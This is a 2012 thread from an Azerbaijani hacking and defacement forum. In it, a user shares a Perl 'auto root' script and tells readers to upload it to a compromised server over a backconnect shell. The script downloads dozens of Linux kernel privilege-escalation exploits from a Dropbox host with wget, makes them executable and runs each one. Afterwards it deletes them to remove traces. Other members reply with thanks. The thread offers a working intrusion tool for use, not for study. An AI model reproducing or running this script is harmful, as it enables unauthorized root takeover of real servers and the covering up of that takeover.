Anti-armenia.ORG - Forumlar - Auto Root Exploits 2011-2012 update



Istifadəçi
    2012-03-20 08:48 GMT                 

CwGhost



VIP
Mesaj Sayı : 160
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   4  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Baku
Ölkə :
Məslək : CwGhost
Yaş :
Mesaj :

Mövzunu Paylaş!


Salamlar, bu autoroot exploitdir, exploitdə işlətmə qaydasını yazmışam yenədə yazım

cwgrootz.pl kimi qeyd edin

exploiti serverə yükləyin (upload) və backconnect olun sonra cmd ekranından

perl cwgrootz.pl yazın enterləyin və gözləyin uyğun exploit varsa rootlayacağ

və ya wget http://dl.dropbox.com/u/71363581/exploit/cwgrootz.pl burdanda cmd ekranından serverə yükləyə bilərsiz exploiti

Kod:
#!/usr/bin/perl
#==============================================================#
#  /  _  \  __ ___/  |_  ____   \______   \ ____   _____/  |_  #
# /  /_\  \|  |  \   __\/  _ \   |       _//  _ \ /  _ \   __\ #
#/    |    \  |  /|  | (  <_> )  |    |   (  <_> |  <_> )  |   #
#\____|__  /____/ |__|  \____/   |____|_  /\____/ \____/|__|   #
#        \/                             \/                     #
#==============================================================#
print "######################################################\n";
print "# Auto Rooting ******* For Linux                     #\n";
print "# Local Root 2011 2012 For Linux                     #\n";
print "# Version: 1.0                                       #\n";
print "# To start script perl cwgrootz.pl                   #\n";
print "# Author   :- CwGhost [Azerbaijan Defacers Group]    #\n";
print "# Love To  :- Anti-Armenia.Org _ Pirates-Crew.Org    #\n";
print "# Email ID :- [cwghost[at]hotmail.com.tr]            #\n";
print "######################################################\n";
{
system("uname -a");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/1-2");
system("chmod 777 1-2");
system("./1-2");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/1-3");
system("chmod 777 1-3");
system("./1-3");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/1-4");
system("chmod 777 1-4");
system("./1-4");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2");
system("chmod 777 2");
system("./2");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2-1");
system("chmod 777 2-1");
system("./2-1");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2-6-32-46-2011");
system("chmod 777 2-6-32-46-2011");
system("./2-6-32-46-2011");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2-6-37");
system("chmod 777 2-6-37");
system("./2-6-37");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.18-6-x86-2011");
system("chmod 777 2.6.18-6-x86-2011");
system("./2.6.18-6-x86-2011");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.18-164-2010");
system("chmod 777 2.6.18-164-2010");
system("./2.6.18-164-2010");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.18-194");
system("chmod 777 2.6.18-194");
system("./2.6.18-194");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.18-194.1-2010");
system("chmod 777 2.6.18-194.1-2010");
system("./2.6.18-194.1-2010");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/acid");
system("chmod 777 acid");
system("./acid");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.18-194.2-2010");
system("chmod 777 2.6.18-194.2-2010");
system("./2=2.6.18-194.2-2010");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.18-274-2011");
system("chmod 777 2.6.18-274-2011");
system("./2.6.18-274-2011");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.28-2011");
system("chmod 777 2.6.28-2011");
system("./2.6.28-2011");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.32-46.1.BHsmp");
system("chmod 777 2.6.32-46.1.BHsmp");
system("./2.6.32-46.1.BHsmp");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.33-2011");
system("chmod 777 2.6.33-2011");
system("./2.6.33-2011");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.34-2011Exploit1");
system("chmod 777 2.6.34-2011Exploit1");
system("./2.6.34-2011Exploit1");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.34-2011Exploit2");
system("chmod 777 2.6.34-2011Exploit2");
system("./2.6.34-2011Exploit2");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.34-2011Exploit1");
system("chmod 777 2.34-2011Exploit1");
system("./2.34-2011Exploit1");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/3");
system("chmod 777 3");
system("./3");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/4");
system("chmod 777 4");
system("./4");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/5");
system("chmod 777 5");
system("./5");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/6");
system("chmod 777 6");
system("./6");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/7");
system("chmod 777 7");
system("./7");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/7-2");
system("chmod 777 7-2");
system("./7-2");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/7x");
system("chmod 777 7x");
system("./7x");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/8");
system("chmod 777 8");
system("./8");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/9");
system("chmod 777 9");
system("./9");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/10");
system("chmod 777 10");
system("./10");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/11");
system("chmod 777 11");
system("./11");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/13x");
system("chmod 777 13x");
system("./13x");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/14");
system("chmod 777 14");
system("./14");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/15.sh");
system("chmod 777 15.sh");
system("./15.sh");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/16");
system("chmod 777 16");
system("./16");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/16-1");
system("chmod 777 16-1");
system("./16-1");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/18");
system("chmod 777 18");
system("./18");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/18-5");
system("chmod 777 18-5");
system("./18-5");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/31");
system("chmod 777 31");
system("./31");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/36-rc1");
system("chmod 777 36-rc1");
system("./36-rc1");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/44");
system("chmod 777 44");
system("./44");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/15150");
system("chmod 777 15150");
system("./15150");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/15200");
system("chmod 777 15200");
system("./15200");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/exp1");
system("chmod 777 exp1");
system("./exp1");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/exp2");
system("chmod 777 exp2");
system("./exp2");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/exp3");
system("chmod 777 exp3");
system("./exp3");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/exploit");
system("chmod 777 exploit");
system("./exploit");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/full-nelson");
system("chmod 777 full-nelson");
system("./full-nelson");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/gayros");
system("chmod 777 gayros");
system("./gayros");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/lenis.sh");
system("chmod 777 lenis.sh");
system("./lenis.sh");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/local-root-exploit-gayros");
system("chmod 777 local-root-exploit-gayros");
system("./local-root-exploit-gayros");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/pwnkernel");
system("chmod 777 pwnkernel");
system("./pwnkernel");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/root1");
system("chmod 777 root1");
system("./root1");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/root.py");
system("chmod 777 root.py");
system("./root.py");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/runx");
system("chmod 777 runx");
system("./runx");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/tivoli");
system("chmod 777 tivoli");
system("./tivoli");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/ubuntu");
system("chmod 777 ubuntu");
system("./ubuntu");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/vmsplice-local-root-exploit");
system("chmod 777 vmsplice-local-root-exploit");
system("./vmsplice-local-root-exploit");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/z1d-2011");
system("chmod 777 z1d-2011");
system("./z1d-2011");
system("id");
system("wget http://dl.dropbox.com/u/71363581/exploit/cwg_2011-2012/2.6.18-374.12.1.el5-2012");
system("chmod 777 2.6.18-374.12.1.el5-2012");
system("./2.6.18-374.12.1.el5-2012");
system("id");
system("whoami");
system("rm cwgrootz.txt");
system("rm 1-2");
system("rm 1-3");
system("rm 1-4");
system("rm 2");
system("rm 2-1");
system("rm 2-6-32-46-2011");
system("rm 2-6-37");
system("rm 2.6.18-6-x86-2011");
system("rm 2.6.18-164-2010");
system("rm 2.6.18-194");
system("rm 2.6.18-194.1-2010");
system("rm acid");
system("rm 2.6.18-194.2-2010");
system("rm 2.6.18-274-2011");
system("rm 2.6.18-374.12.1.el5-2012");
system("rm 2.6.28-2011");
system("rm 2.6.32-46.1.BHsmp");
system("rm 2.6.33");
system("rm 2.6.33-2011");
system("rm 2.6.34-2011Exploit1");
system("rm 2.6.34-2011Exploit2");
system("rm 2.6.37");
system("rm 2.6.37-rc2");
system("rm 2.34-2011Exploit1");
system("rm 3");
system("rm 4");
system("rm 5");
system("rm 6");
system("rm 7");
system("rm 7-2");
system("rm 7x");
system("rm 8");
system("rm 9");
system("rm 10");
system("rm 11");
system("rm 13x");
system("rm 14");
system("rm 15.sh");
system("rm 16");
system("rm 16-1");
system("rm 18");
system("rm 18-5");
system("rm 31");
system("rm 36-rc1");
system("rm 44");
system("rm 15150");
system("rm 15200");
system("rm exp1");
system("rm exp2");
system("rm exp3");
system("rm exploit");
system("rm full-nelson");
system("rm gayros");
system("rm lenis.sh");
system("rm local-root-exploit-gayros");
system("rm pwnkernel");
system("rm root1");
system("rm root.py");
system("rm runx");
system("rm tivoli");
system("rm ubuntu");
system("rm vmsplice-local-root-exploit");
system("rm z1d-2011");
system("rm exploit.conf");
system("rm a.c");
print "Rootlanmadi kefini pozma :) Basqasini Rootlayarsan :) \n";
}

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2012-03-20 09:05 GMT                 

TheScream



Banned
Mesaj Sayı : 122
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   1  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 25
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər Əllərin Dərd görməsin

Anti-armenia.ORG
    

Istifadəçi
    2012-03-20 17:30 GMT                 

Dr.KroOoZ



C0d3r
Mesaj Sayı : 127
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   11  
Indi Saytda : Durum
Cinsiyyət :
Şəhər :
Ölkə :
Məslək : Dr.KroOoZ
Yaş :
Mesaj :

Mövzunu Paylaş!


i have this from 2011 its not for 2012 only [ 2011 - 2010 ]

Anti-armenia.ORG
    

Istifadəçi
    2012-03-20 18:04 GMT                 

Ferid23



Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Çox sağol qaqa gözəl paylaşımdır. Təşəkkür!

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
    

Istifadəçi
    2012-03-20 19:52 GMT                 

ikus4



VIP
Mesaj Sayı : 81
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : ikus4
Yaş :
Mesaj :

Mövzunu Paylaş!


GooD Təşəkkürlər

Anti-armenia.ORG
    

Istifadəçi
    2012-04-07 15:23 GMT                 

Policy



İstifadəçi
Mesaj Sayı : 1
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Qız
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Reported by max from : attention! Dropbox using as platform for hackers atack ( (
http://forums.dropbox.com/topic.php?id=57835

Anti-armenia.ORG